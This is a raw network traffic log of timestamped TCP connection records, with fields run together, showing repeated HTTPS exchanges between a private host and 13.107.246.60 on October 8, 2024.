                                                                                                                                                            Oct 8, 2024 05:09:05.957007885 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.957159042 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.957180977 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.961796999 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.962265015 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.962290049 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.962708950 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.962714911 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.000269890 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.000703096 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.000813961 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.000813961 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.000847101 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.000857115 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.003827095 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.003869057 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.003945112 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.004075050 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.004091024 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.050409079 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.050620079 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.050679922 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.050729990 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.050745964 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.050759077 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.050765038 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.053520918 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.053606987 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.053694010 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.053855896 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.053889036 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.062582970 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.062760115 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.062819958 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.062864065 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.062879086 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.062897921 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.062901974 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.065023899 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.065045118 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.065283060 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.066140890 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.066153049 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.480129004 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.501724958 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.501790047 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.502240896 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.502264977 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.598161936 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.598397970 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.598611116 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.598611116 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.598611116 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.601329088 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.601357937 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.601598024 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.601733923 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.601746082 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.621642113 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.640470982 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.667387962 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.693224907 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.698450089 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.713506937 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.713562012 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.713937998 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.713953018 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.713994026 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.714006901 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.714589119 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.714593887 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.714821100 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.714881897 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.715303898 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.715316057 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.732693911 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.733087063 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.733098984 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.733472109 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.733475924 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.807962894 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.808034897 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.809212923 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.809282064 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.809328079 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.809649944 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.809672117 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.809717894 CEST49839443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.809724092 CEST4434983913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.810583115 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.810764074 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.810827017 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.811285973 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.811322927 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.811353922 CEST49840443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.811368942 CEST4434984013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.812313080 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.812446117 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.813188076 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.813858986 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.813880920 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.814079046 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.814102888 CEST4434983813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.816386938 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.816442966 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.816956043 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.817589045 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.817625999 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.817692995 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.817996979 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.818028927 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.818360090 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.818373919 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.819032907 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.819081068 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.819147110 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.819377899 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.819401979 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.838785887 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.838922977 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.838978052 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.839149952 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.839163065 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.839171886 CEST49841443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.839176893 CEST4434984113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.841124058 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.841135979 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:06.841389894 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.841502905 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:06.841514111 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.317735910 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.318495989 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.318511009 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.319190979 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.319197893 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.424458027 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.424576044 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.424637079 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.424848080 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.424866915 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.424876928 CEST49842443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.424881935 CEST4434984213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.428522110 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.428575039 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.428658962 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.428822041 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.428833008 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.500536919 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.501144886 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.501174927 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.501804113 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.501808882 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.513425112 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.514028072 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.514106989 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.514472961 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.514487982 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.525413990 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.525893927 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.525934935 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.526366949 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.526376009 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.546570063 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.547111988 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.547127008 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.547506094 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.547511101 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.609133959 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.609340906 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.609401941 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.609467983 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.609510899 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.609565973 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.609632015 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.609669924 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.609694958 CEST49843443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.609710932 CEST4434984313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.613085985 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.613183022 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.613272905 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.613679886 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.613733053 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.616895914 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.617846966 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.617927074 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.617990017 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.617990017 CEST49844443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.618021965 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.618046999 CEST4434984413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.621049881 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.621092081 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.621324062 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.622683048 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.622704983 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.626738071 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.626893997 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.626950026 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.626992941 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.626992941 CEST49845443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.627017021 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.627029896 CEST4434984513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.629606962 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.629617929 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.629717112 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.630047083 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.630054951 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.653788090 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.654436111 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.654484034 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.654488087 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.654536963 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.654689074 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.654696941 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.654709101 CEST49846443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.654715061 CEST4434984613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.657746077 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.657782078 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:07.657857895 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.657999992 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:07.658027887 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.093944073 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.095078945 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.095078945 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.095113039 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.095134020 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.193514109 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.193747997 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.193854094 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.194000959 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.194000959 CEST49847443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.194021940 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.194036007 CEST4434984713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.197400093 CEST49852443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.197429895 CEST4434985213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.197711945 CEST49852443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.197711945 CEST49852443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.197738886 CEST4434985213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.245990992 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.246562958 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.246649027 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.247143984 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.247160912 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.279792070 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.280330896 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.280348063 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.280745983 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.280750036 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.280796051 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.281183958 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.281265974 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.281517982 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.281517982 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.281534910 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.282985926 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.282985926 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.282998085 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.283008099 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.346899033 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.347172976 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.347291946 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.347291946 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.347379923 CEST49851443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.347444057 CEST4434985113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.351025105 CEST49853443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.351072073 CEST4434985313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.351200104 CEST49853443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.351316929 CEST49853443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.351325035 CEST4434985313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.377170086 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.377306938 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.377418041 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.377420902 CEST4434985013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.377763033 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.377763987 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.377763987 CEST49850443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.380726099 CEST49854443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.380770922 CEST4434985413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.380954027 CEST49854443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.381050110 CEST49854443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.381059885 CEST4434985413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.386740923 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.386831999 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.387429953 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.387429953 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.387554884 CEST49848443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.387577057 CEST4434984813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.388459921 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.388612986 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.388782024 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.388878107 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.388878107 CEST49849443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.388892889 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.388900995 CEST4434984913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.390999079 CEST49855443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:08.391028881 CEST4434985513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:08.391052961 CEST49856443192.168.2.513.107.246.60
